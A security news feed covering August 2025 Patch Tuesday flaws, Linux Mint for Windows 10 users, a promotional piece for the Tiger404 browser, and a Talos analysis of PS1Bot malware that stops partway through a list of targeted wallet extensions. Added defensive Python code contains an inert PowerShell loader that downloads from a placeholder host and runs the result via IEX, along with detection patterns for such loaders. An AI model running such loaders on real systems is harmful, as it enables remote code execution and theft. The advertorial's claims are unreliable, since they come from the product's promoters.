Microsoft today released updates to fix more than 100 security flaws in its Windows operating systems and other software. At least 13 of the bugs received Microsoft’s most-dire “critical” rating, meaning they could be abused by malware or malcontents to gain remote access to a Windows system with little or no help from users.
August’s patch batch from Redmond includes an update for CVE-2025-53786, a vulnerability that allows an attacker to pivot from a compromised Microsoft Exchange Server directly into an organization’s cloud environment, potentially gaining control over Exchange Online and other connected Microsoft Office 365 services. Microsoft first warned about this bug on Aug. 6, saying it affects Exchange Server 2016 and Exchange Server 2019, as well as its flagship Exchange Server Subscription Edition.
Ben McCarthy, lead cyber security engineer at Immersive, said a rough search reveals approximately 29,000 Exchange servers publicly facing on the internet that are vulnerable to this issue, with many of them likely to have even older vulnerabilities.
McCarthy said the fix for CVE-2025-53786 requires more than just installing a patch, such as following Microsoft’s manual instructions for creating a dedicated service to oversee and lock down the hybrid connection.
“In effect, this vulnerability turns a significant on-premise Exchange breach into a full-blown, difficult-to-detect cloud compromise with effectively living off the land techniques which are always harder to detect for defensive teams,” McCarthy said.
CVE-2025-53779 is a weakness in the Windows Kerberos authentication system that allows an unauthenticated attacker to gain domain administrator privileges. Microsoft credits the discovery of the flaw to Akamai researcher Yuval Gordon, who dubbed it “BadSuccessor” in a May 2025 blog post. The attack exploits a weakness in “delegated Managed Service Account” or dMSA — a feature that was introduced in Windows Server 2025.
Some of the critical flaws addressed this month with the highest severity (between 9.0 and 9.9 CVSS scores) include a remote code execution bug in the Windows GDI+ component that handles graphics rendering (CVE-2025-53766) and CVE-2025-50165, another graphics rendering weakness. Another critical patch involves CVE-2025-53733, a vulnerability in Microsoft Word that can be exploited without user interaction and triggered through the Preview Pane.
One final critical bug tackled this month deserves attention: CVE-2025-53778, a bug in Windows NTLM, a core function of how Windows systems handle network authentication. According to Microsoft, the flaw could allow an attacker with low-level network access and basic user privileges to exploit NTLM and elevate to SYSTEM-level access — the highest level of privilege in Windows. Microsoft rates the exploitation of this bug as “more likely,” although there is no evidence the vulnerability is being exploited at the moment.
Feel free to holler in the comments if you experience problems installing any of these updates. As ever, the SANS Internet Storm Center has its useful breakdown of the Microsoft patches indexed by severity and CVSS score, and AskWoody.com is keeping an eye out for Windows patches that may cause problems for enterprises and end users.
GOOD MIGRATIONS
Windows 10 users out there likely have noticed by now that Microsoft really wants you to upgrade to Windows 11. The reason is that after the Patch Tuesday on October 14, 2025, Microsoft will stop shipping free security updates for Windows 10 computers. The trouble is, many PCs running Windows 10 do not meet the hardware specifications required to install Windows 11 (or they do, but just barely).
If the experience with Windows XP is any indicator, many of these older computers will wind up in landfills or else will be left running in an unpatched state. But if your Windows 10 PC doesn’t have the hardware chops to run Windows 11 and you’d still like to get some use out of it safely, consider installing a newbie-friendly version of Linux, like Linux Mint.
Like most modern Linux versions, Mint will run on anything with a 64-bit CPU that has at least 2GB of memory, although 4GB is recommended. In other words, it will run on almost any computer produced in the last decade.
There are many versions of Linux available, but Linux Mint is likely to be the most intuitive interface for regular Windows users, and it is largely configurable without any fuss at the text-only command-line prompt. Mint and other flavors of Linux come with LibreOffice, which is an open source suite of tools that includes applications similar to Microsoft Office, and it can open, edit and save documents as Microsoft Office files.
If you’d prefer to give Linux a test drive before installing it on a Windows PC, you can always just download it to a removable USB drive. From there, reboot the computer (with the removable drive plugged in) and select the option at startup to run the operating system from the external USB drive. If you don’t see an option for that after restarting, try restarting again and hitting the F8 button, which should open a list of bootable drives. Here’s a fairly thorough tutorial that walks through exactly how to do all this.
And if this is your first time trying out Linux, relax and have fun: The nice thing about a “live” version of Linux (as it’s called when the operating system is run from a removable drive such as a CD or a USB stick) is that none of your changes persist after a reboot. Even if you somehow manage to break something, a restart will return the system back to its original state.
Officials are reportedly blaming a recent breach of the U.S. federal court’s filing system on Russia, whose hackers used the access to snoop on midlevel criminal cases in the New York City area and other jurisdictions.
Russian government hackers said to be behind US federal court filing system hack: Report (posted 2025-08-12)
Connex Credit Union breach exposes data of 172,000 members, legal probe launched, experts urge victims to monitor accounts…
Connex Credit Union Data Breach Affects 172,000 Members (posted 2025-08-12)
The need for online anonymity has never been greater. As surveillance capabilities grow more sophisticated and data collection becomes ubiquitous, users are turning to anonymous browsers to protect their privacy. Traditional browsers like Firefox and Brave offer privacy modes and tracker blocking, while browsers such as Tor provide anonymity through onion routing. However, the landscape of anonymous browsers is nuanced, and choosing the right tool requires a careful understanding of their trade-offs and technical capabilities.
Tor Browser remains the benchmark for network anonymity, routing traffic through multiple volunteer nodes to obscure user location and activity. This approach provides strong defenses against network-level surveillance and censorship. However, Tor’s latency and compatibility challenges make it less practical as a daily driver for most users. Its strict design and slower speeds can impede usability, limiting its appeal to activists, security researchers, and those with specific anonymity needs rather than everyday privacy-focused internet users.
Mainstream privacy browsers like Brave improve on traditional privacy features by blocking trackers and third-party cookies, but they operate within legal jurisdictions that can impose data collection demands and surveillance. Brave’s business model, tied to advertising and cryptocurrency rewards, means that users remain participants in a commodified attention economy, limiting the level of true anonymity and directly linking the user to their browsing activity.
Other privacy-focused browsers, such as Mullvad, offer a streamlined experience with robust privacy defaults but largely rely on standard network connections and local software installation, without advanced compartmentalization or decentralized infrastructure. Firefox, while open source and configurable, does not natively provide multi-layered session isolation or the ability to customize network routing on a per-tab basis.
Then there is Tiger404, which presents a fundamentally different architecture designed for digital sovereignty and operational anonymity. It combines the compatibility and performance advantages of a Chromium-based browser engine with advanced features like disposable, physically isolated anonymous browser containers and granular network isolation. Each session operates as a sandboxed container with unique fingerprints and distinct proxy or multi-hop routing configurations, preventing cross-session correlation and making fingerprinting significantly more difficult, and browsing the internet anonymously a reality.
Moreover, Tiger404’s cloud-native architecture offers a significant security advantage through physical isolation and airgapping of the browsing environment. Unlike traditional browsers installed directly on a user’s device—which can leave behind residual data, cached files, and system-level artifacts that can be exploited or traced—Tiger404 runs sessions in isolated containers hosted remotely. This approach effectively “airgaps” the browser from the local machine, so that browsing activities do not interact with the device’s operating system or storage.
This physical separation dramatically reduces the risk of data leakage or compromise through malware, keyloggers, or forensic analysis of local storage. It also mitigates threats stemming from compromised devices or insider attacks, since sensitive browsing data never touches the user’s hardware. Users gain the ability to close a session and erase all traces instantly, with no lingering footprints left behind on their computers or mobile devices.
In contrast, locally installed browsers—even those with strong privacy settings—are vulnerable to leaving behind identifiable artifacts such as cookies, browsing history, cached files, or browser fingerprints that can be collected or analyzed. Furthermore, local installations are subject to OS-level compromises, making it easier for attackers or surveillance actors to monitor activity or extract data.
By separating the browsing environment from the endpoint device, Tiger404 provides an operational security model closer to airgapped systems used in high-security environments. This approach not only protects user anonymity but also elevates overall system security, enabling safer anonymous browsing without sacrificing accessibility or convenience.
Tiger404’s isolated browsing sessions make managing multiple social accounts more straightforward and secure. By compartmentalizing each identity within its own sandboxed container, users can easily keep profiles separate without risk of cross-contamination or linkage, simplifying account management while preserving anonymity.
While no anonymous browser is a silver bullet, Tiger404 addresses many of the limitations found in both mainstream and specialized options by balancing usability, operational security, and network-level anonymity. It provides a practical solution for users who require strong, consistent anonymity without sacrificing everyday functionality.
In conclusion, navigating the landscape of anonymous browsers requires a clear understanding of their inherent trade-offs. While Tor delivers unparalleled network anonymity, its practical limitations often restrict everyday use. Mainstream browsers prioritize convenience but cannot guarantee full anonymity due to inherent design and jurisdictional constraints. Tiger404 sets a new standard by embracing a sovereignty-first philosophy, combining robust anonymity with seamless usability. It empowers users to reclaim control over their digital footprint without compromise, offering a powerful, adaptable solution for those who demand true online privacy in today’s complex digital environment.
Rethinking Anonymity: Why Privacy Browsers Fall Short (posted 2025-08-12)
Microsoft has released its monthly security update for August 2025, which includes 111 vulnerabilities affecting a range of products, including 13 that Microsoft marked as “critical”.
In this month’s release, Microsoft observed none of the included vulnerabilities being actively exploited in the wild. Out of 13 “critical” entries, 9 are remote code execution (RCE) vulnerabilities in Microsoft Windows services and applications including the Windows kernel, Microsoft Message Queuing (MSMQ), Windows Hyper-V, Microsoft Office and GDI+.
CVE-2025-50176 is an RCE vulnerability in the DirectX Graphics Kernel given a CVSS 3.1 score of 7.8, where access of a resource using an incompatible type (‘type confusion’) in the Graphics Kernel allows an authorized attacker to execute code locally. Microsoft has noted that this vulnerability affects different versions of Windows 11, Windows Server 2022 and Windows Server 2025. Microsoft assessed that the attack complexity is “low”, and that exploitation is “more likely”.
CVE-2025-50177 is an RCE vulnerability in the Microsoft Message Queuing (MSMQ) service, given a CVSS score of 8.1, where a use-after-free vulnerability allows an unauthorized attacker to execute code over a network. To exploit this vulnerability, an attacker would need to send a series of specially crafted MSMQ packets in a rapid sequence over HTTP to an MSMQ server. Microsoft assessed that the attack complexity is “high”, and that exploitation is “more likely”.
CVE-2025-53778 is a Windows NTLM elevation of privilege vulnerability given a CVSS 3.1 base score of 8.8, where improper authentication in Windows NTLM allows an authorized attacker to elevate privileges over a network; an attacker who successfully exploits this vulnerability gains SYSTEM privileges. Microsoft has noted that this vulnerability affects different versions of Windows 10, Windows 11, Windows Server 2008, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 and Windows Server 2025. Microsoft assessed that the attack complexity is “low”, and that exploitation is “more likely”.
CVE-2025-53781 is an information disclosure vulnerability in Windows Hyper-V given a CVSS 3.1 base score of 7.7, where an authorized attacker may be able to disclose sensitive information over a network. Microsoft has noted that this vulnerability affects Windows Server 2025 with the attack complexity assessed as “low” and that exploitation as “less likely”.
CVE-2025-53733 is a remote code execution vulnerability in Microsoft Word given a CVSS 3.1 base score of 8.4 where an incorrect conversion between numeric types in Microsoft Office Word allows an unauthorized attacker to execute code locally. Microsoft has noted that this vulnerability affects Word 2016, Microsoft SharePoint Server 2019, Microsoft SharePoint Enterprise Server 2016, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft Office LTSC 2019 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.
CVE-2025-53740 is a remote code execution vulnerability in Microsoft Office, given a CVSS 3.1 base score of 8.4 where a use after free condition allows an unauthorized attacker to execute code locally using a Preview Pane as the attack vector. Microsoft has noted that this vulnerability affects Microsoft Office LTSC for Mac 2024, Microsoft Office LTSC for Mac 2021, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft Office LTSC 2019, Microsoft Office LTSC 2016 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.
CVE-2025-53766 is a remote code execution vulnerability in GDI+, a Windows graphics subsystem providing a set of features for rendering 2D graphics, images, and text, given a CVSS 3.1 base score of 9.8 where a heap-based buffer overflow allows an unauthorized attacker to execute code over a network. An attacker could trigger this vulnerability by convincing a victim to download and open a document that contains a specially crafted metafile. Microsoft has noted that this vulnerability affects various versions of Windows 10, Windows 11 and Windows Server 2008. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.
CVE-2025-50165 is another remote code execution vulnerability in the Windows graphics component. It was also given a CVSS 3.1 base score of 9.8 where an untrusted pointer dereference allows an unauthorized attacker to execute code over a network without any user intervention. An attacker can use an uninitialized function pointer being called when decoding a JPEG image. This can be embedded in Office and 3rd party documents/files. This vulnerability affects Windows 11 24H2 and Windows Server 2025. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.
CVE-2025-49707 is a spoofing vulnerability in the Windows Hyper-V hypervisor affecting Azure, given a CVSS 3.1 base score of 7.9, where improper access control may allow an attacker to perform spoofing locally. To exploit this vulnerability, an attacker could obtain a valid certificate after a system reboot, which could then be used to access sensitive information, bypassing security measures and allowing an attacker with access to a confidential VM to impersonate its identity in communications with external systems. Microsoft has noted that this vulnerability affects the NCCadsH100v5-series, ECesv5-series, ECedsv5-series, ECasv5-series, ECadsv5-series, DCesv5-series, DCedsv5-series, DCasv5-series and DCadsv5-series of Azure VMs. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.
CVE-2025-48807 is a remote code execution vulnerability in Windows Hyper-V hypervisor, given a CVSS 3.1 base score of 7.5, where improper restriction of communication channels to intended endpoints may result in an attacker executing code locally in a nested guest VM to escape their VM and gain admin privileges on the guest VM that is serving as the host. Microsoft has noted that this vulnerability affects various versions of Windows 10, Windows 11 and Windows Server VM. Microsoft assessed that the attack complexity is “high”, and that exploitation is “less likely”.
CVE-2025-53731 is a remote code execution vulnerability in Microsoft Office, given a CVSS 3.1 base score of 8.4, where exploiting a use after free vulnerability may allow an unauthorized attacker to execute code locally, with the Preview Pane as an attack vector. Microsoft has noted that this vulnerability affects Microsoft Office LTSC for Mac 2024, Microsoft Office LTSC for Mac 2021, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft Office 2019, Microsoft Office 2016 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “unlikely”.
CVE-2025-53784 is a remote code execution vulnerability affecting Microsoft Word, given a CVSS 3.1 base score of 8.4, where exploiting a use after free vulnerability may allow an unauthorized attacker to execute code locally, with the Preview Pane as an attack vector. Microsoft has noted that this vulnerability affects Microsoft Office LTSC for Mac 2024, Microsoft Office LTSC for Mac 2021, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “unlikely”.
CVE-2025-53793 is an information disclosure vulnerability in Microsoft Azure Stack Hub, which may allow an attacker to disclose system internal configuration information over the network. It was given a CVSS 3.1 base score of 7.5 and affects Azure Stack Hub 2501, Azure Stack Hub 2406 and Azure Stack Hub 2408. Microsoft assessed that the attack complexity is “low”, and that exploitation is “unlikely”.
Aside from the vulnerabilities patched and disclosed in the regular monthly patch release for August, it is worth noting that one week ahead of the monthly update, Microsoft disclosed 4 vulnerabilities affecting Microsoft cloud services, CVE-2025-53767, CVE-2025-53774, CVE-2025-53787 and CVE-2025-53792. While the CVSS base score for some of them is high, Microsoft has noted that no customer actions are required to resolve the issues.
Talos would also like to highlight the following “important” vulnerabilities as Microsoft has determined that their exploitation is “more likely”:
CVE-2025-53786: Microsoft Exchange Server Hybrid Deployment Elevation of Privilege Vulnerability
CVE-2025-49743: Windows Graphics Component Elevation of Privilege Vulnerability
CVE-2025-50167: Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2025-50168: Win32k Elevation of Privilege Vulnerability
CVE-2025-53132: Win32k Elevation of Privilege Vulnerability
CVE-2025-53147: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
CVE-2025-53156: Windows Storage Port Driver Information Disclosure Vulnerability
CVE-2025-49712: Microsoft SharePoint Remote Code Execution Vulnerability
A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.
In response to these vulnerability disclosures, Talos is releasing a new Snort ruleset that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Ruleset customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Snort 2 rules included in this release that protect against the exploitation of many of these vulnerabilities are: 65234-65237, 65240-65247.
The following Snort 3 rules are also available: 301300, 301301, 30304-30306, 65240, 65241.
Microsoft Patch Tuesday for August 2025 — Snort rules and prominent vulnerabilities (posted 2025-08-12)
Cisco Talos has observed an ongoing malware campaign that seeks to infect victims with a multi-stage malware framework, implemented in PowerShell and C#, which we are referring to as “PS1Bot.”
PS1Bot features a modular design, with several delivered modules used to perform a variety of malicious activities on infected systems, including information theft, keylogging, reconnaissance and the establishment of persistent system access.
PS1Bot has been designed with stealth in mind, minimizing persistent artifacts left on infected systems and incorporating in-memory execution techniques to facilitate execution of follow-on modules without requiring them to be written to disk.
PS1Bot distribution campaigns have been extremely active since early 2025, with new samples being observed frequently throughout the year.
The information stealer module implementation leverages wordlists embedded into the stealer to enumerate files containing passwords and seed phrases that can be used to access cryptocurrency wallets, which the stealer also attempts to exfiltrate from infected systems.
Campaign Overview
Cisco Talos has been monitoring an ongoing malware campaign that has been active throughout 2025. The campaign appears to be leveraging malvertising to direct victims to a multi-stage malware framework, implemented in PowerShell and C#, that possesses robust functionality, including the ability to deliver follow-on modules such as an information stealer, keylogger, screen capture collector and more. It also establishes persistence to continue operations following system reboots. The design of this malware framework appears to attempt to minimize artifacts left on infected systems by facilitating the delivery and execution of modules in memory, without requiring them to be written to disk. Due to similarities in design and implementation with the malware family AHK Bot, we are referring to this PowerShell-based malware as “PS1Bot.”
This campaign has been extremely active, with new samples being observed continuously over the past several months. The cluster of malicious activity associated with this campaign also overlaps with prior reporting, including reporting on Skitnet. While Talos has not observed delivery of the Skitnet binary in any of the infection chains we analyzed, the PowerShell implementation described in that reporting appears to match the components delivered throughout the infection chain in this case as well. We have also observed significant overlap in the C2 infrastructure used in both cases. Likewise, we have observed code and indicator overlap with previously reported malvertising campaigns.
Delivery
The victim is initially delivered a compressed archive. The file names Talos observed in the wild are consistent with what is typically seen during search engine optimization (SEO) poisoning and/or malvertising campaigns, where the file name matches the keyword phrase being targeted in the campaigns:
chapter 8 medicare benefit policy manual.zip
Counting Canadian Money Worksheets Pdf.zip.e49
zebra gx430t manual.zip.081
kosher food list pdf (1).zip.c9a
pambu panchangam 2024-25 pdf.zip.a7a
Prior reporting on social media further strengthens this assessment, where researchers have observed the malvertising campaigns leading to the compressed archives delivered in this campaign.
Inside the compressed archive is a single file called “FULL DOCUMENT.js” that functions as a downloader, retrieving the next stage of the infection. In the cases analyzed, the JS file contained VBScript, which employed a variety of obfuscation methods throughout 2025. Below is one of the simpler examples observed recently.
Figure 1. Deobfuscating the downloader script.
Stage 1 retrieval
When executed, the malware retrieves a JScript scriptlet from an attacker controlled server, the contents of which are then executed.
Figure 2. Example JScript scriptlet contents.
This script is responsible for performing the environmental setup needed for subsequent malware operations to function properly. This includes writing a PowerShell script to C:\ProgramData (ntu.ps1 in this case) and then executing that file (its contents are redacted for space in the previous screenshot). This PowerShell script obtains the serial number of the C: drive and uses it to construct a URL, which it uses to attempt to establish a connection to the command and control (C2) server to retrieve additional malicious content to execute. Any PowerShell content received is then passed to Invoke-Expression (IEX) and executed within the existing PowerShell process. This is repeated in a loop with Sleep() delays added between each iteration.
Figure 3. PowerShell module retrieval and C2 polling.
This allows the malware to continue to run, periodically attempting to poll the attacker’s C2 server to retrieve additional commands to execute within the PowerShell process running on the system. We have observed this technique used to deliver a variety of additional modules, each enabling the attacker to conduct additional operations on the system, obtain additional environmental information about systems under their control, and enable the theft of sensitive information such as credentials, session tokens and financial account details (cryptocurrency wallet data).
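The delivery chain and stage-1 loader behaviour described above (a script host running the extracted .js, PowerShell launched from a .ps1 dropped in C:\ProgramData, and a drive-serial, fetch, IEX, Sleep polling loop) map onto two checks a defender can run: one over process-creation telemetry and one over recovered script text. This is an added example, not Talos code; the event layout, process IDs, the c2.invalid hostname and the inert loader stand-in are constructed.

```python
import re
from dataclasses import dataclass

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style, constructed)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_chain(events):
    """Flag the delivery chain: a script host running a .js/.vbs from a temp or
    archive-extraction folder, PowerShell spawned by that script host, and
    PowerShell executing a .ps1 dropped into C:\\ProgramData."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        img = basename(e.image)
        cmd = e.cmdline.lower()
        if img in SCRIPT_HOSTS and re.search(r"\\temp\\.*\.(js|jse|vbs)\b", cmd):
            findings.append((e.pid, "script host running a script from a temp/extraction path"))
        if img in POWERSHELL:
            parent = by_pid.get(e.ppid)
            if parent and basename(parent.image) in SCRIPT_HOSTS:
                findings.append((e.pid, "PowerShell spawned by a script host"))
            if re.search(r'\\programdata\\[^\s"]*\.ps1\b', cmd):
                findings.append((e.pid, "PowerShell executing a .ps1 from C:\\ProgramData"))
    return findings


# Static traits of the stage-1 script: drive serial used as a per-victim token,
# remote fetch, Invoke-Expression, and a sleep-driven polling loop.
LOADER_TRAITS = {
    "volume_serial": r"volumeserialnumber|win32_logicaldisk|get-volume",
    "remote_fetch": r"downloadstring|downloaddata|invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b",
    "invoke_expression": r"invoke-expression|\biex\b",
    "sleep_loop": r"\b(while|do|for|foreach)\b[\s\S]*\bstart-sleep\b",
}


def scan_script(text: str):
    """Return the names of loader traits present in a PowerShell script body."""
    t = text.lower()
    return [name for name, pat in LOADER_TRAITS.items() if re.search(pat, t)]


def looks_like_loader(text: str) -> bool:
    """Fetch + IEX + sleep loop together form the polling-loader signature."""
    return {"remote_fetch", "invoke_expression", "sleep_loop"} <= set(scan_script(text))


# Constructed telemetry: FULL DOCUMENT.js from an extracted archive, run by
# wscript, which launches the dropped C:\ProgramData\ntu.ps1; plus one benign
# admin script started from Explorer.
SAMPLE_EVENTS = [
    ProcEvent(1200, 800, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1340, 1200, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\u\AppData\Local\Temp\Temp1_zebra gx430t manual.zip\FULL DOCUMENT.js"'),
    ProcEvent(1410, 1340, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -w hidden -ep bypass -f C:\ProgramData\ntu.ps1"),
    ProcEvent(1500, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Scripts\inventory.ps1"),
]

# Constructed, inert stand-in for the stage-1 polling script; hostname is a placeholder.
SAMPLE_LOADER = r'''
$sn = (Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'").VolumeSerialNumber
while ($true) {
    try { IEX ((New-Object Net.WebClient).DownloadString("http://c2.invalid/$sn")) } catch {}
    Start-Sleep -Seconds 60
}
'''

BENIGN_SCRIPT = r"Get-ChildItem C:\Scripts | ForEach-Object { Write-Output $_.Name }"

if __name__ == "__main__":
    for pid, why in detect_chain(SAMPLE_EVENTS):
        print(f"pid {pid}: {why}")
    print("loader traits:", scan_script(SAMPLE_LOADER), "->", looks_like_loader(SAMPLE_LOADER))
    print("benign traits:", scan_script(BENIGN_SCRIPT), "->", looks_like_loader(BENIGN_SCRIPT))
```

The trait scan is deliberately tolerant of obfuscation only at the level of casing and aliasing (iex, iwr); heavily encoded scripts should be deobfuscated first, as in Figure 1.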
PowerShell modules
We have observed the delivery of the following types of PowerShell modules during and after the initial infection process. Each module is responsible for carrying out its respective task, and several rely on delivery of C# classes that are dynamically compiled to generate assembly DLLs and executed to assist with collection of survey information, keylogging, and screenshot capture.
Antivirus detection
Screen capture
Wallet grabber
Keylogger
Information collection
Persistence
In most of the modules analyzed, logging functionality has been built in to allow the attacker to monitor the installation and runtime status during and post-deployment. In most cases, these status updates are delivered to the C2 server in the form of URL parameters that are included as part of HTTP GET requests to the URL used to establish an initial C2 connection.
We assess with high confidence that additional modules likely exist and are deployable as desired by the adversary. The modular nature of the implementation of this malware provides flexibility and enables the rapid deployment of updates or new functionality as needed. While analyzing activity associated with PS1Bot throughout 2025, we have observed development activities occurring over time, indicating that this is a rapidly evolving threat.
Antivirus detection
This PowerShell module is delivered after initial C2 establishment and is responsible for obtaining and reporting the antivirus programs present on the infected system. This is accomplished by querying Windows Management Instrumentation (WMI) to obtain a list of installed antivirus products.
Figure 4. Antivirus detection logic.
The returned product list is then transmitted to the attacker via an HTTP GET request containing the results of the operation as URL parameters.
Figure 5. Status logging implementation.
The following is an example of the URL structure used to transmit the information to the C2 server:
Once this is completed, execution is passed back to the main PowerShell script and C2 beaconing continues until additional instructions are received. In several cases, we have observed the delivery of several distinct PowerShell scripts during the infection process. To facilitate delivery of new PowerShell scripts, we have observed that the attacker simply manipulates the response content associated with the C2 URL derived initially. Each time the infected system beacons to the C2 server, any delivered PowerShell is dynamically passed to IEX and executed.
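The beaconing and status-logging behaviour in the preceding paragraphs (a fixed-delay GET loop against one C2 URL, with progress messages pushed as URL parameters) can be hunted in proxy logs by looking for request series with near-constant spacing. This is an added example, not Talos code: the log format, the c2.invalid host and the log=/product= parameter names are constructed, since the real URL structure is not reproduced above.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log: "<iso-timestamp> <client> <method> <url> <status>".
SAMPLE_LOG = """\
2025-08-12T20:00:00 10.0.0.15 GET http://c2.invalid/1a2b3c4d 200
2025-08-12T20:00:07 10.0.0.15 GET http://updates.example.net/catalog.xml 200
2025-08-12T20:01:00 10.0.0.15 GET http://c2.invalid/1a2b3c4d?log=av_check_started 200
2025-08-12T20:01:58 10.0.0.15 GET http://c2.invalid/1a2b3c4d?log=av_done&product=WindowsDefender 200
2025-08-12T20:02:31 10.0.0.15 GET http://updates.example.net/catalog.xml 304
2025-08-12T20:02:59 10.0.0.15 GET http://c2.invalid/1a2b3c4d 200
2025-08-12T20:03:10 10.0.0.15 GET http://updates.example.net/pkg/1.cab 200
2025-08-12T20:03:59 10.0.0.15 GET http://c2.invalid/1a2b3c4d 200
2025-08-12T20:04:58 10.0.0.15 GET http://c2.invalid/1a2b3c4d 200
"""


def parse_log(text):
    """Yield (timestamp, client, method, url) for each well-formed line."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, client, method, url, _status = parts
        yield datetime.fromisoformat(ts), client, method, url


def find_beacons(text, min_requests=4, max_jitter=0.2):
    """Group GET requests by (client, host, path) and report series whose
    inter-request gaps are nearly constant, i.e. a fixed Sleep() loop.
    Query-parameter names are collected because this family pushes its
    status logs through them."""
    series = defaultdict(lambda: {"times": [], "params": set()})
    for ts, client, method, url in parse_log(text):
        if method != "GET":
            continue
        u = urlsplit(url)
        key = (client, u.netloc, u.path)
        series[key]["times"].append(ts)
        series[key]["params"].update(parse_qs(u.query).keys())
    findings = []
    for (client, host, path), s in series.items():
        times = sorted(s["times"])
        if len(times) < min_requests:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = mean(gaps)
        if period <= 0:
            continue
        jitter = pstdev(gaps) / period  # coefficient of variation of the gaps
        if jitter <= max_jitter:
            findings.append({
                "client": client, "host": host, "path": path,
                "requests": len(times), "period_s": round(period),
                "jitter": round(jitter, 3), "params": sorted(s["params"]),
            })
    return findings


if __name__ == "__main__":
    for finding in find_beacons(SAMPLE_LOG):
        print(finding)
```

Legitimate update checks also poll, so treat a hit as a lead to pivot on (new host, path that looks like a volume serial, status-like parameters) rather than a verdict on its own.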
Screen capture
Once antivirus detection has been performed, we have observed the delivery of additional PowerShell modules, one of which is used to capture screenshots on infected systems and transmit the resulting images to the C2 server. This is often performed for a variety of reasons, including to identify when systems may be in active use by victims versus unattended or to collect sensitive information that may be displayed on screen but not otherwise recorded for easy exfiltration.
In this case, the adversary is using PowerShell to dynamically compile and execute a C# assembly DLL at runtime.
Figure 6. Example use of Add-Type for C# compilation.
The resulting DLL is then used to capture the screenshot and create a Bitmap image (.BMP) inside of the %TEMP% directory. The image is later converted and stored as a JPEG at %APPDATA%\Screenshot.jpg.
Figure 7. Screenshot generation logic.
The content stored within the image file is then Base64 encoded and the resulting data is then transmitted to C2. The image files in both %TEMP% and %APPDATA% are also deleted.
Figure 8. Example HTTP POST containing Base64 encoded screenshot image file.
Additionally, status logging messages are sent to inform the attacker of the module’s progress, an example of which is shown below.
Following successful collection of screenshots on infected systems, we have observed the delivery of an additional PowerShell module, which the attacker refers to as the "grabber module," that is used to steal sensitive data from infected systems. It is designed to target the following types of data, which are then exfiltrated to the C2 server:
Local browser storage (stored credentials, cookies, etc.)
Browser extension data for cryptocurrency-related extensions like wallets
Local application data for cryptocurrency wallet applications
Files containing passwords, sensitive strings or wallet seed phrases
The module begins by checking the values of variables that were declared in earlier stages of the infection process. If the script is not being executed within the context of the PowerShell process established earlier, it will fail and terminate execution.
Next, it begins transmitting status logging messages to the C2 server via HTTP GET requests to inform the attacker that the grabber module is running and to provide basic runtime information. Log messages are periodically transmitted during the execution of this module to provide ongoing status updates, error alerting and other relevant information throughout the execution process.
The malware first checks for the existence of various installed applications of interest, including browsers, browser extensions and cryptocurrency wallet applications. If found, the application data is copied to %TEMP% for staging.
The malware specifically checks for the existence of application data associated with the following web browsers:
Google Chrome
Chromium
Kometa
Microsoft Edge
7Star
Maxthon
Opera
Atom
Mustang
Opera GFX
AVG Secure Browser
Netbox Browser
Brave
Avast Secure Browser
Orbitum
Vivaldi
CCleaner Browser
QQ Browser
Yandex
Chedot
SalamWeb
Slimjet
Chrome Beta
Sidekick
Epic Privacy Browser
Chrome Canary
Sleipnir
Comodo Dragon
Citrio
Sputnik
CentBrowser
CoolNovo
Superbird
Naver Whale
Coowon
Swing Browser
SRWare Iron
CryptoTab Browser
Tempest
Blisk
Elements Browser
UC Browser
Torch
Iridium
Ulaa
Coc Coc
Kinza
UR Browser
Amigo
Wavebo
Viasat Browser
In addition to the previously listed browsers, the information stealer also checks for the installation of the following Chromium extensions, most of which are associated with cryptocurrency wallets and multi-factor authentication (MFA) authenticators:
MetaMask
Trezor
wallet-guard-protect-your
MetaMask-edge
Ledger
subwallet-polkadot-wallet
MetaMask-Opera
Mycelium
argent-x-starknet-wallet
Trust-Wallet
TrustWallet
bitget-wallet-formerly-bi
Atomic-Wallet
Ellipal
core-crypto-wallet-nft-ex
Binance
Dapper
braavos-starknet-wallet
Phantom
BitKeep
Kepler
Coinbase
Argent
martian-aptos-sui-wallet
Ronin
Blockchain Wallet
xverse-wallet
Exodus
cryptocom-wallet-extension
gate-wallet
Coin98
Zerion
sender-wallet
KardiaChain
Aave
desig-wallet
TerraStation
Curve
fewcha-move-wallet
Wombat
